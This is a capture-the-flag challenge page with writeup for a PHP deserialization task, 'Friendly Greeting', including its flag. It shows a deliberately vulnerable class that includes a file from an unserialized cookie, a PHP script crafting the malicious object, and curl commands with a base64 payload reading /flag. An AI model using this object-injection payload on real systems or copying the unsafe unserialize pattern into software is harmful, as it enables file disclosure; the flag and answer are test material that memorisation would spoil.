# Friendly Greeting

## Index

[[_TOC_]]

## Points

* Difficulty: Easy-Medium
* Maximum Score `200`
* Minimum Score `50`
* Decadence `15`

## Hints

None

## Flag

`bitup21{352c2c634ffbdca3bc60f6f220180341}`

## Attachments

* index.zip (MD5: 8565e0ef7386124550c558a2f6a811f2)
    * index.php (MD5: 8752bf22d7c0e1edade32d305643ce4b)

## Deploy

Click [here](deploy) to see how to deploy the challenge with Docker. 

## Requirements

**Docker** is required to deploy the challenge.

## Description

Making greetings great again!

## Writeup

This is a beginner-oriented PHP deserialization.

```php
class FriendlyGreeting {
    public $param;
    public $file;

    public function __construct() {
        $this->init();
    }

    public function init() {
        $this->file = ""; // for __destruct()
        $this->param = $_GET['name']; // for greet()
    }

    public function greet() {
        return "Hello, $this->param!";
    }

    public function __destruct() {
        if (!empty($this->file)) {
            include($this->file);
        }
    }
}

```

With an obvious entry point:

```php
unserialize(base64_decode($_COOKIE['greeting']));
```

So let's craft the serialized object and send it to the server:

```php
<?php

if (count($argv) == 1) {
    echo "No argument specified\n";
    exit;
}

class FriendlyGreeting {
    public $param;
    public $file;
}

$obj = new FriendlyGreeting();
$obj->file = $argv[1];
echo base64_encode(serialize($obj));

?>
```

```bash
$~ curl https://friendly-greeting.bitupalicante.com -b "greeting=$(php deser.php '/flag')"
bitup21{352c2c634ffbdca3bc60f6f220180341}
```

or:

```bash
$~ curl https://friendly-greeting.bitupalicante.com -b "greeting=TzoxNjoiRnJpZW5kbHlHcmVldGluZyI6Mjp7czo1OiJwYXJhbSI7TjtzOjQ6ImZpbGUiO3M6NToiL2ZsYWciO30="
bitup21{352c2c634ffbdca3bc60f6f220180341}
```

## Notes

None

## References

* https://owasp.org/www-community/vulnerabilities/PHP_Object_Injection

## Author

@jorgectf
